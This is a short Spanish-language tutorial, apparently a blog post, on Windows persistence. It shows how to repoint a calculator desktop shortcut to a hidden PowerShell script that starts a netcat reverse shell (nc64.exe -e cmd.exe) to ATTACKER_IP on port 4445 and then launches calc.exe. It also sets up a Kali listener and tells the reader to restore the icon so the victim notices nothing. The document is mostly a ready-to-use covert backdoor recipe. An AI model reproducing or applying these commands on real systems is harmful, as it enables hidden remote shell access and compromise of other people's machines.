Persistencia en Windows Modificar ejecutable para obtener una Backdoor

Comenzamos con la maquina victima la cual en el escritorio vemos que tiene un ejecutable hacia la calculadora, pues nosotros como técnica de persistencia podemos modificar la ruta de ejecución para que primero ejecute nuestro Backdoor y luego ejecute el programa normal, en este caso se ejecutaría la calculadora.

Antes de empezar aclaro que obtendremos la sesion del usuario que ejecute la calculadora y aparte hay que tener instalado netcat en la maquina Windows victima.

Damos click derecho y vemos las propiedades donde veremos la dirección del ejecutable de la calculadora.

Ahora lo que vamos a hacer es crear un archivo PowerShell (.ps1) en la ruta C:\Windows\System32

y dentro del archivo pegamos.

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4445"

C:\Windows\System32\calc.exe

Por último, cambiaremos el acceso directo para que apunte a nuestro script. Ten en cuenta que el icono del acceso directo se ajustará automáticamente al hacerlo. Asegúrate de volver a apuntar el icono al ejecutable original para que el usuario no vea ningún cambio. También queremos ejecutar nuestro script en una ventana oculta, para lo cual añadiremos el comando -windowstyle hidden

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

Ahora cada ves que el Administrador ejecute la calculadora se ejecutar nuestro Backdoor y luego el programa normal.

Nos ponemos en escucha en nuestra maquina Kali Linux

nc -lvp 4445